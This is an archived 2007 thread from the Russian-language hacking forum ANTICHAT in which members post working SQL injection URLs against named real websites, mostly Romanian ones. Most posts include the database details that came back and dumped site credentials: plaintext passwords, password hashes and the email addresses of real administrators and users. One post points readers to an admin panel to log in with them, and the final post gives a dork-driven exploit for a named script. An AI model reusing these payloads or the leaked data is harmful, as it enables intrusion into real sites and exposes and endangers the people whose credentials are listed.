ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.11.2007, 09:57
|
|
Познающий
Регистрация: 06.09.2006
Сообщений: 94
Провел на форуме:
397064
Репутация:
15
|
|
webmaster:e0afac77ae41af23c696457742954ac5
Код:
Password ;) :web55ter
|
|
|
20.11.2007, 10:20
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Румыния
old.jurnalul.ro
Код:
http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
5.0.24a-log:jurnalul:jurnalul@avjnet-web
45 таблиц:
Код:
http://old.jurnalul.ro/articol.php?id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+44,1/*
Наша таблица - admin:
Код:
id,username,parola,pages,data,status
username : parola
Код:
zass:floaredelotus
cristi:dinamo
lucian:lucian
|
|
|
|
20.11.2007, 10:55
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Румыния
fundatia-sundari.ro
Код:
http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
5.0.45-community-log:fundatia_sundaridefault:fundatia_Robert@localh ost
43 таблицы:
Код:
http://www.fundatia-sundari.ro/marturii.php?id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+42,1/*
Есть таба Users:
Код:
UserID,Nume,Parola,Email,Level,
FirstName,LastName,Newsletter,Activated,
LastLogin,LastIP,ConfirmationCode,SundariEMail,
SundariEMailActivated,LastTime,MSN,Y,AIM,
ICQ,Oras,DataNasterii,SiteWeb,Ocupatia,
Interese,Personal,Imagine
- hacked -
|
|
|
|
20.11.2007, 11:13
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.videodive.ru/imgnews/news.php?id=-163+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/*
4.0.26-log/u9053@10.10.223.211/u9053 |
|
|
|
20.11.2007, 12:12
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://ron.the-underdogs.info/game.php?id=-135+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x2F,user,password),23,24,25,26,27,28,29,30,31,32,33,34,35+from+mysql.user/*
Данные: 4.0.27/ron@localhost/ron
Юзеры правда хеш 8(
root/4bca6e21230d24de
flashback/4e62830249e37403
ron/1b4fdeb00b833ac5
macgarden/4a5fe7e15ca085b0
Underdogs/4bca6e21230d24de
doggie/69288c4855bbb52a
forum/3bd00f75423ddffd
hotu/3213f1351227ad25
community/4dfedf012cc6837d
zzt/0e5829ac32cde319
john_doe/70520cc9573c1cd3
phpAds/58efd1e0451c7a6c |
|
|
|
20.11.2007, 12:34
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.krepsinis.net/news.php?news_id=-66514+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,concat_ws(char(58,58),FIRST_NAME,password),14,15,16,17,18,19,20+from+users+limit+2,2/*
Данные: 5.0.22-log/sportotiltas1@192.168.69.21/krepsinis
Админы и юзеры
Saulius::66666
Vaidas::vynas
Mindaugas::Eimantukas
Tomas::121212
Dainius::alytus
Tadas::tokogero666
Arvydas::vaisas
Matas::mamamia
Romanas::sharp
Valdas::zatoic
Valentinas::33977 |
|
|
|
20.11.2007, 12:45
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.flushy.com/games.php?id=-324+union+select+1,concat_ws(0x2F,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13/*
4.0.27-max-log/flushy@64.202.163.220/flushy |
|
|
|
20.11.2007, 14:28
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Румыния
traditii.ro
Код:
http://www.traditii.ro/articol.php?nr_articol=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
4.1.22-standard-log:traditii_traditii:traditii_cata@localhost
parerea.com
Код:
http://parerea.com/articol.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*
4.1.22-standard : parereac_wrdp1 : parereac@localhost
agir.ro
Код:
http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/*
5.0.45-community-log:agirro_ziar:agirro_agir@localhost
76 таблиц:
Код:
http://www.agir.ro/articol.php?id_articol=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+75,1/*
Наша таба - agir_users:
Код:
id,username,password,email,title,realname,url,icq,msn,aim,yahoo,
location,use_avatar,signature,disp_topics,disp_posts,email_setting,
save_pass,notify_with_post,smilies,show_img,show_avatars,show_sig,
link_to_new_win,timezone,style,num_posts,status,last_post,registered,
last_visit,last_action,admin_note,activate_string
Вывод данных:
Код:
http://www.agir.ro/articol.php?id_articol=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6,7,8,9,10+from+agirro_forum.agir_users+limit+109,1/*
|
|
|
|
20.11.2007, 15:58
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Румыния - не обижайся!
visione.ro
Код:
http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11/*
5.1.20-beta-log:visione:visione@localhost
87 таблиц:
Код:
http://www.visione.ro/articol.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+86,1/*
Наши табы forum_users и users
Данные из users (юзер:пасс:мыло:статус):
Код:
andrei:andrei17:andrei@his.ro:Admin
tibi:t0nal357:tibi@visione.ro:Admin
mihaela:euristic:mihaelaraducea@yahoo.com:Moderator
loredana:huodinamo:lungu_lore@yahoo.com:Moderator
Cosmina:liublliuliubllia:cosmina@visione.ro:Admin
afs:timisoara:afsava@socio.uvt.ro:Moderator
adi:adi:office@subgraphic.ro:Admin
nusa:nusa:nusa.bugeac@gmail.com:Supervizor
andrei.bold:andrei:andrei.bold@sistempsi.ro:Supervizor
ada:ada:gravekiss@yahoo.co.uk:Supervizor
cristina:cristina:cristina2find@yahoo.com.au:Supervizor
camelia:camelia:camitza84@yahoo.com:Supervizor
Админка по адресу _http://www.visione.ro/admin/,
данные для админки смотри выше 
|
|
|
|
20.11.2007, 17:49
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
SQL-инъекция в HotScripts Clone Script
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием software-description.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Код:
http://site/software-description.php?id=[SQL-inj]
Дорк: inurl:"software-description.php?"
Пример: www.filelook.com
Смотрим версию мускула, текущего юзера, имя базы:
Код:
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/
5.0.45-community:filelook_fileloo@localhost:filelook_file look
Повезло версия мускула=>5, имена таблиц подбирать не нужно, есть таблица information_schema: смотрим названия таблиц, меняя лимит:
Код:
_http://www.filelook.com/software-description.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1/*
Таблицы:
CHARACTER_SETS (0)
COLLATIONS (1)
COLLATION_CHARACTER_SET_APPLICABILITY (2)
COLUMNS (3)
COLUMN_PRIVILEGES (4)
KEY_COLUMN_USAGE (5)
PROFILING (6)
ROUTINES (7)
SCHEMATA (8)
SCHEMA_PRIVILEGES (9)
STATISTICS (10)
TABLES (11)
TABLE_CONSTRAINTS (12)
TABLE_PRIVILEGES (13)
TRIGGERS (14)
USER_PRIVILEGES (15) -
VIEWS (16)
csv_feed (17)
data (18)
filelook_author_submission (19)
filelook_awards (20)
filelook_errreport (21)
phpcountersmart_besucher (22)
phpcountersmart_browser (23)
phpcountersmart_color (24)
phpcountersmart_ip (25)
phpcountersmart_os (26)
phpcountersmart_provider (27)
phpcountersmart_referer (28)
phpcountersmart_screen (29)
sbwmd_admin (30) - интересная таблица ;-) поля: id, admin_name, pwd
sbwmd_ads (31)
sbwmd_banners (32)
sbwmd_categories(33)
sbwmd_config(34) - интересная таблица ;-)
Всего 35 таблиц.
Смотрим логин и пасс админа, id:
Код:
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin/*
admin:minur786:1
Находим админку:
Код:
_http://www.filelook.com/siteadmin
К сожалению... облом! (логин и пасс не подходят к админке или запрещены удалённые подключения ?).
Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?
Код:
_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*
Ещё один пример: brigaderu.ru
Код:
http://brigaderu.ru/software-description.php?id=-1+union+select+concat(version(),0x3a,user(),0x3a,database())/*
4.1.22:brigader@fe20.hc.ru:wwwbrigaderuru
Админ:
Код:
_http://brigaderu.ru/software-description.php?id=-1+UNION+SELECT+concat(admin_name,char(58),pwd,char(58),id)+FROM+sbwmd_admin/*
siteadm:brg48Zm:1
Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?509262){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?509283){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?509297){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?509303){kind=avatar}
Линейный вид
